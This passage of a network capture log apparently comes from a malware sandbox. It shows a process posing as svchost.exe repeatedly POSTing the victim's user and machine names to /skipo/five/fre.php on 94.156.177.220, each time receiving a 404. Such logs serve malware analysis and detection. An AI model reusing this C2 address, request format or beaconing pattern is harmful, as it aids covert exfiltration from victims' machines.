Oct 27, 2024 08:51:36.996360064 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:37.949821949 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.5	50049	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:38.136085033 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:38.141525030 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:39.128349066 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.5	50050	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:39.297519922 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:39.303117990 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:40.255909920 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:40 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.5	50051	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:40.413975954 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:40.420433998 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:41.379986048 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.5	50052	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:41.533195019 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:41.538598061 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:42.532524109 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:42 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.5	50053	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:42.694575071 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:42.700129986 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:43.667777061 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.5	50054	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:43.831491947 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:43.837038040 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:44.793545961 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.5	50055	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:45.056003094 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:45.061398983 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:46.014677048 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.5	50056	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:46.183765888 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:46.189174891 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:47.142678976 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.5	50057	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:47.631727934 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:47.637134075 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:48.595319986 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.5	50058	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:48.766890049 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:48.773539066 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:49.778708935 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.5	50059	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:49.965749979 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:49.971106052 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:50.937827110 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.5	50060	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:51.105014086 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:51.110434055 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:52.084106922 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.5	50061	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:52.272306919 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:52.277797937 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:53.279484987 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.5	50062	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:53.442929029 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:53.448342085 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:54.429394007 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.5	50063	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:54.652326107 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:54.657778978 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:55.643529892 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.5	50064	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:55.812553883 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:55.818063021 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:56.780179024 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.5	50065	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:57.254256964 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:57.259902000 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:58.233050108 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.5	50066	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:58.410533905 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:58.416004896 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:59.409586906 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.5	50067	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:59.578775883 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:59.584177017 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:52:00.558684111 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:52:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.5	50068	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:52:00.738553047 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:52:00.744111061 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:52:01.715008020 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:52:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.5	50069	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
